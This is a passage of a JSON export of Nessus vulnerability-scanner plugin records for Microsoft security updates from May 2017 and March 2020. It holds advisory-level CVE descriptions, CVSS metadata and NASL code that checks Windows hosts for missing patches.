Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0235)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. 
(CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. 
(CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4016871/windows-10-update-kb4016871\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f546dcfb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4016871.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4016871' # 10 1703 \n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1703)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4016871))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:28:45", "description": "The remote Windows host is missing security update 4541500 or cumulative update 4540688. 
It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. 
The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a user's system. 
There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0849)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. 
(CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-03-24T00:00:00", "type": "nessus", "title": "KB4541500: Windows 7 and Windows Server 2008 R2 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0814", "CVE-2020-0822", "CVE-2020-0824", "CVE-2020-0830", "CVE-2020-0832", "CVE-2020-0833", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0860", "CVE-2020-0871", "CVE-2020-0874", "CVE-2020-0877", "CVE-2020-0879", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAR_4540688.NASL", "href": "https://www.tenable.com/plugins/nessus/134865", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134865);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0814\",\n \"CVE-2020-0822\",\n \"CVE-2020-0824\",\n \"CVE-2020-0830\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0860\",\n \"CVE-2020-0871\",\n \"CVE-2020-0874\",\n \"CVE-2020-0877\",\n \"CVE-2020-0879\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\"\n );\n script_xref(name:\"MSKB\", value:\"4540688\");\n script_xref(name:\"MSKB\", value:\"4541500\");\n script_xref(name:\"MSFT\", value:\"MS20-4540688\");\n script_xref(name:\"MSFT\", value:\"MS20-4541500\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4541500: Windows 7 and Windows Server 2008 R2 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4541500\nor cumulative update 4540688. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. (CVE-2020-0871)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. 
(CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0844)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. 
(CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the user's system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a user's system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0849)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. 
The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\");\n # https://support.microsoft.com/en-us/help/4540688/windows-7-update-kb4540688\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?210cd1ec\");\n # https://support.microsoft.com/en-us/help/4541500/windows-7-update-kb4541500\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a7405b8a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4541500 or Cumulative Update KB4540688.\n\nPlease Note: These updates are only available through Microsoft's Extended Support Updates program.\nThis operating system is otherwise unsupported.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0883\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4540688', '4541500');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", 